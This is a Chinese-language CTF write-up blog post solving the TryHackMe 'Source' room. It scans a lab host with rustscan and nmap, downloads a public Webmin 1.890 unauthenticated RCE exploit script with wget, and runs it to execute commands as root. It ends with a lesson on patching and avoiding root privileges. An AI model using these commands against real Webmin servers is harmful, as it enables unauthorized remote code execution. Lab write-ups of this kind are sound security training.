昨天的题目主要都是暴力破解,相对之下感觉有一点点无聊,那今天我们来打一个简单的 Exploit 吧!
今天采用的题目是 Try Hack Me 上面的 Source
rustscan
来进行扫描,Rustscan 最大的优点是扫描速度很快。
rustscan -a 10.10.63.154 -r 1-65535
nmap -A -p22,10000 10.10.63.154
MiniServ 1.890
/etc/hosts
/etc/hosts
加上下面这行
10.10.63.154 ip-10-10-63-154.eu-west-1.compute.internal
MiniServ 1.890
Exploit
wget https://raw.githubusercontent.com/foxsin34/WebMin-1.890-Exploit-unauthorized-RCE/master/webmin-1.890_exploit.py
python3 {程序.py} {IP} {Port} {指令}
python3 webmin-1.890_exploit.py 10.10.63.154 10000 id
id
指令,就回传回来了/root/root.txt
,我们可以试着直接猫它
ls /home
dark
ls /home/dark
这一题题目告诉了我们,使用旧版的程序不更新,攻击者可以轻易地骇进系统,就算没有帐号密码也没关系。而非必要状况,也尽量不要使用 Root 权限执行程序,当攻击者骇入程序後,就可以直接的取得 Root 的权限。
>>: Flutter基础介绍与实作-Day8 Hello Flutter(2)
p段落标签最常使用搭配段落文章使用 同时也是一个display:block特性的元素 <p&g...
这个部分算是JavaScript比较难缠的部分,不是难以理解,而是因为比较冗杂,稍稍心浮气躁,就没...
复习一下我们之前提到的观念,想要有一个好的预测模型,拥有一个好的资料集是一件很重要的事,因此我们在做...
在产品网站上,常常会见到付费价格的页面,其实 Tailwind 也是有像 Bootstrap 一样...
当我们一直需要重复使用某些功能的时候,可以将程序码打包成一个模组,而有些好心人士将自己写好的多个模组...